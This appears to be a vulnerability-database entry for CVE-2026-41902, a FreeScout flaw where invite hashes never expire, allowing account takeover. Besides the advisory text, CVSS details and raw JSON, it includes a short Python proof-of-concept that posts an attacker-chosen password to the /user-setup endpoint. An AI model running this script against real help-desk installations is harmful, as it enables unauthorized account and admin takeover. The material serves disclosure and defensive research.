Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-41902 CVSS 9.1 CRITICAL

CVE-2026-41902

Published: 2026-05-07 19:16:01
Last Modified: 2026-05-08 22:16:31
Source: [email protected]

Description

FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, the /user-setup/{hash} endpoint accepts a 60-character random invite_hash to set a new user's password. The endpoint performs no expiration check β€” the hash remains valid indefinitely until consumed. Combined with realistic hash-leakage scenarios (forwarded invite emails, HTTP referrer to external CDNs on the setup page, server-side log exposure, abandoned invite emails in shared inboxes), this enables unauthenticated permanent account takeover months or years after invite issuance. If the leaked invite was sent to an admin, the takeover yields admin access. This issue has been patched in version 1.8.217.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

FreeScout < 1.8.217

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_host = "http://example.com" leaked_invite_hash = "1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef" # 60 chars # The vulnerable endpoint url = f"{target_host}/user-setup/{leaked_invite_hash}" # New password payload payload = { "password": "HackedPassword123!", "password_confirmation": "HackedPassword123!" } try: # Sending the request to reset password response = requests.post(url, data=payload) if response.status_code == 200: print("[+] Potentially successful! Password may have been reset.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41902", "sourceIdentifier": "[email protected]", "published": "2026-05-07T19:16:00.807", "lastModified": "2026-05-08T22:16:30.810", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, the /user-setup/{hash} endpoint accepts a 60-character random invite_hash to set a new user's password. The endpoint performs no expiration check β€” the hash remains valid indefinitely until consumed. Combined with realistic hash-leakage scenarios (forwarded invite emails, HTTP referrer to external CDNs on the setup page, server-side log exposure, abandoned invite emails in shared inboxes), this enables unauthenticated permanent account takeover months or years after invite issuance. If the leaked invite was sent to an admin, the takeover yields admin access. This issue has been patched in version 1.8.217."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "references": [{"url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.